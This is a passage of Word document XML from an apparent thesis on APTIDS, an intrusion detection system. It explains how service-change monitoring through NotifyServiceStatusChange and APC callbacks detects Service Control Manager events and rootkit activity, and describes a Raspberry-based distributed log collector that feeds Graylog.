        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>After finish writing logs and sends log to server, WriteLog returns execution control to NotifyCallback, which then returns control to SvcChangeNotify and starts again from step 3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC60B1" w:rsidRDefault="00DC60B1">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3F21BB" w:rsidRPr="00DE075B" w:rsidRDefault="003F21BB" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc485303733"/>
      <w:r w:rsidRPr="00DE075B">
        <w:lastRenderedPageBreak/>
        <w:t>NotifyServiceStatusChange</w:t>
      </w:r>
      <w:r w:rsidR="007D1D38" w:rsidRPr="00DE075B">
        <w:t xml:space="preserve"> and Asynchronous Procedure Calls</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w:rsidR="00130C5A" w:rsidRDefault="007D1D38" w:rsidP="003F21BB">
      <w:r>
        <w:t>NotifyServiceStatusChange is an essential API in the operations of Service Monitor Module. NotifyServiceStatusChange takes</w:t>
      </w:r>
      <w:r w:rsidR="00130C5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:id w:val="-1875848606"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00130C5A" w:rsidRPr="00130C5A">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00130C5A" w:rsidRPr="00130C5A">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Mic4 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00130C5A" w:rsidRPr="00130C5A">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00130C5A" w:rsidRPr="00130C5A">
            <w:rPr>
              <w:noProof/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:t>(22)</w:t>
          </w:r>
          <w:r w:rsidR="00130C5A" w:rsidRPr="00130C5A">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00130C5A" w:rsidRPr="00130C5A" w:rsidRDefault="00130C5A" w:rsidP="00130C5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="007D1D38">
        <w:t xml:space="preserve">he handle return by OpenSCManager </w:t>
      </w:r>
      <w:r>
        <w:t>as a handle for accessing the SCM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00130C5A" w:rsidRPr="00AC6309" w:rsidRDefault="00130C5A" w:rsidP="00130C5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>An object of the struct called “SERVICE_NOTIFY” which stores 2 important variables:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC6309" w:rsidRPr="00AC6309" w:rsidRDefault="00AC6309" w:rsidP="00AC6309">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Pointer to a callback function to which the thread will execute in case there is any change happened.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC6309" w:rsidRDefault="00AE511C" w:rsidP="00AE511C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>A context which can simply be explained as a user defined variable for the callback function.</w:t>
      </w:r>
      <w:r w:rsidR="00C56305">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> The context in this case stores an event handler which NotifyServiceStatusChange monitors for SCM event.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE511C" w:rsidRDefault="00C56305" w:rsidP="00AE511C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>The condition according to which NotifyServiceStatusChange performs action. This condition is a DWORD value which is defined by a XORed operation between two defined integer</w:t>
      </w:r>
      <w:r w:rsidR="00BD3224">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> as “SERVICE_NOTIFY_</w:t>
      </w:r>
      <w:r w:rsidR="00BD3224">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>CREATED” and “SERVICE_NOTIFY_DELETED”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00047AC7" w:rsidRDefault="003B53B6" w:rsidP="00047AC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">The event handler is passed to a Windows API called WaitForSingleObject to wait for any SCM event and return control to the callback function for further operations as described in section 3.3.2. </w:t>
      </w:r>
      <w:r w:rsidR="00047AC7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>NotifyServiceStatusChange not only captures the events belong to application services, but also can capture the device services which helps us in detecting rootkits’ behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D26AF5" w:rsidRDefault="000B5B0F" w:rsidP="00047AC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">When the service status changes, the system invokes the specified callback as an Asynchronous Procedure Call (APC) queued to the calling thread. </w:t>
      </w:r>
      <w:r w:rsidR="009729D4">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">An APC is a function executing asynchronously in the context of a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009729D4">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>particular thread</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009729D4">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D26AF5">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">When an APC is queued to a thread, the system issues a software interrupt. The next time the thread is scheduled, it will run the APC function </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:id w:val="-1363514047"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00094EB9" w:rsidRPr="00DC60B1">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00094EB9" w:rsidRPr="00DC60B1">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Mic5 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00094EB9" w:rsidRPr="00DC60B1">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00094EB9" w:rsidRPr="00DC60B1">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              <w:noProof/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:t>(23)</w:t>
          </w:r>
          <w:r w:rsidR="00094EB9" w:rsidRPr="00DC60B1">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00D26AF5">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00576CC6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Each thread has its own APC queue. An APC function called “queued to a thread” is a function that added to that thread’s queue. The queuing of an APC function is a request for the thread to call that APC function next time the thread is scheduled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00047AC7" w:rsidRDefault="00D26AF5" w:rsidP="00047AC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>In this case, SvcChangeNotify is an independent thread that is executed by APTIDS.exe. SvcChangeNotify now calls NotifyServiceStatusChange for query the changes in SCM. When captures an SCM activities (such as service request on creating service), NotifyServiceStatusChange call the callback function (NotifyCallback)</w:t>
      </w:r>
      <w:r w:rsidR="00094EB9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the way that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs </w:t>
      </w:r>
      <w:r w:rsidR="00094EB9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>asynchronously</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> from SvcChangeNotify thread. Therefore, to</w:t>
      </w:r>
      <w:r w:rsidR="00094EB9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> capture and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00094EB9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>run NotifyCallback whenever SCM event occurs, SvcChangeNotify must be set in an alert-able state. Tt passed the SCM event handler to WaitForSingleObject, this API then waits infinitely until a SCM event occurs, captures the event by alerting on the event and execute the APC function which is the NotifyCallback.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00094EB9" w:rsidRDefault="00094EB9" w:rsidP="00047AC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B53B6" w:rsidRDefault="005A10E7" w:rsidP="00C56305">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The workflows for NotifyServiceStatusChange, APC and their cooperative mates are described in the following figure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D33EA" w:rsidRDefault="00DC3F5C" w:rsidP="009D33EA">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DF7B23A" wp14:editId="7B2ADE14">
            <wp:extent cx="5581650" cy="52616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1650" cy="5261610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A10E7" w:rsidRPr="009D33EA" w:rsidRDefault="009D33EA" w:rsidP="009D33EA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc485303775"/>
      <w:r w:rsidRPr="009D33EA">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3</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5</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009D33EA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> NotifyServiceStatusChange and APC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w:rsidR="00130C5A" w:rsidRDefault="009D33EA" w:rsidP="00AC6309">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>The workflows can be explained as follow:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D33EA" w:rsidRDefault="009D33EA" w:rsidP="009D33EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>SvcChangeNotify calls NotifyServiceStatusChange for monitoring SCM events. NotifyServiceStatusChange takes these arguments for running:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D33EA" w:rsidRDefault="00DC3F5C" w:rsidP="009D33EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>A SCM handle that returned from OpenSCManager.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3F5C" w:rsidRDefault="00DC3F5C" w:rsidP="009D33EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>A Callback Context storing the arguments for the Callback function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3F5C" w:rsidRDefault="00DC3F5C" w:rsidP="009D33EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>A SCM Event Hander for handling SCM event.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3F5C" w:rsidRDefault="00DC3F5C" w:rsidP="007D6443">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3F5C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>A Pointer to the Callback function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3F5C" w:rsidRDefault="00DC3F5C" w:rsidP="007D6443">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Callback function that points to NotifyCallback</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3F5C" w:rsidRDefault="00DC3F5C" w:rsidP="007D6443">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>An object of the SERVICE_NOTIFY struct that stores pointer to (b), (c), (d), (e).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3F5C" w:rsidRDefault="00DC3F5C" w:rsidP="00DC3F5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>NotifyServiceStatusChange then create an APC queue for NotifyCallback when called.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3F5C" w:rsidRDefault="00DC3F5C" w:rsidP="00DC3F5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>SvcChangeNotify calls WaitForSingleObject to wait for SCM event happens.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3F5C" w:rsidRDefault="00DC3F5C" w:rsidP="00DC3F5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>WaitForSingleObject set the thread to alertable state which will capture and execute APC function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3F5C" w:rsidRDefault="00DC3F5C" w:rsidP="00DC3F5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>When an SCM event occurs, NotifyCallback is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3F5C" w:rsidRPr="00DC3F5C" w:rsidRDefault="00DC3F5C" w:rsidP="00DC3F5C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3F5C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E646DE" w:rsidRPr="00130C5A" w:rsidRDefault="00E646DE" w:rsidP="00130C5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E445CE" w:rsidRDefault="007D6443" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc485303734"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Distributed </w:t>
      </w:r>
      <w:r w:rsidR="00E445CE">
        <w:t>Log Collector Hardware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w:rsidR="007D6443" w:rsidRPr="007D6443" w:rsidRDefault="007D6443" w:rsidP="007D6443">
      <w:r>
        <w:t>The role of a</w:t>
      </w:r>
      <w:r w:rsidR="00C21216">
        <w:t xml:space="preserve"> Distributed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Log Collector Hardware</w:t>
      </w:r>
      <w:r w:rsidR="00C21216">
        <w:t xml:space="preserve"> (DLCH)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the concept of this thesis is a distributed log collector server, which has been implemented in an opensource hardware device (such as Raspberry). We aim to create a log server that can store log for hundr</w:t>
      </w:r>
      <w:r w:rsidR="003024F5">
        <w:t>eds of devices simultaneously. Its main function is simple, just stay silently and collecting log that is sent from the agent integrated in APTIDS. W</w:t>
      </w:r>
      <w:r>
        <w:t>hen rec</w:t>
      </w:r>
      <w:r w:rsidR="003024F5">
        <w:t>eiving the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> log, </w:t>
      </w:r>
      <w:r w:rsidR="00C21216">
        <w:t>DLCH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> writes the log down to its storage system for Graylog Collector Sidecar to collect and send them to the Graylog server.   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1554A" w:rsidRPr="00C973CF" w:rsidRDefault="00A1554A" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc485303735"/>
      <w:r w:rsidRPr="00C973CF">
        <w:t>Log Collector Hardware architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w:rsidR="00A1554A" w:rsidRDefault="00A1554A" w:rsidP="00A1554A">
      <w:r>
        <w:t>The architecture of Log Collector Hardware can be graphically described in the figure below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00134A20" w:rsidRDefault="00E26D9F" w:rsidP="00134A20">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28C0FF6D" wp14:editId="357056EC">
            <wp:extent cx="5581650" cy="5097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1650" cy="5097145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00134A20" w:rsidRPr="00134A20" w:rsidRDefault="00134A20" w:rsidP="00134A20">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc485303776"/>
      <w:r w:rsidRPr="00134A20">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3</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6</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00134A20">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Distributed Log Collector Hardware architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w:rsidR="00F4418A" w:rsidRDefault="00F4418A" w:rsidP="00A1554A"/>
    <w:p w:rsidR="00F4418A" w:rsidRDefault="00F4418A" w:rsidP="00A1554A"/>
    <w:p w:rsidR="00F4418A" w:rsidRPr="00C973CF" w:rsidRDefault="00C63970" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc485303736"/>
      <w:r w:rsidRPr="00C973CF">
        <w:t xml:space="preserve">Distributed </w:t>
      </w:r>
      <w:r w:rsidR="00F4418A" w:rsidRPr="00C973CF">
        <w:t>Log Collector Hardware workflow</w:t>
      </w:r>
      <w:r w:rsidRPr="00C973CF">
        <w:t>s</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w:rsidR="00C63970" w:rsidRDefault="00137AE0" w:rsidP="00F4418A">
      <w:r>
        <w:t xml:space="preserve">Distributed </w:t>
      </w:r>
      <w:r w:rsidR="00F4418A">
        <w:t>Log Collector Hardware is a log collector server which is deployed in an opensource hardware for collecting log from APTIDS’s module. Since APTIDS run silently in the background, its log collector and sending module is called whenever APTIDS module detects any critical change (which is predefined in the configure file</w:t>
      </w:r>
      <w:r w:rsidR="00C63970">
        <w:t xml:space="preserve">s). A single </w:t>
      </w:r>
      <w:r>
        <w:t>DLCH</w:t>
      </w:r>
      <w:r w:rsidR="00C63970">
        <w:t xml:space="preserve"> can store log for up to more than 200 clients that connect simultaneously. For managing each client, </w:t>
      </w:r>
      <w:r>
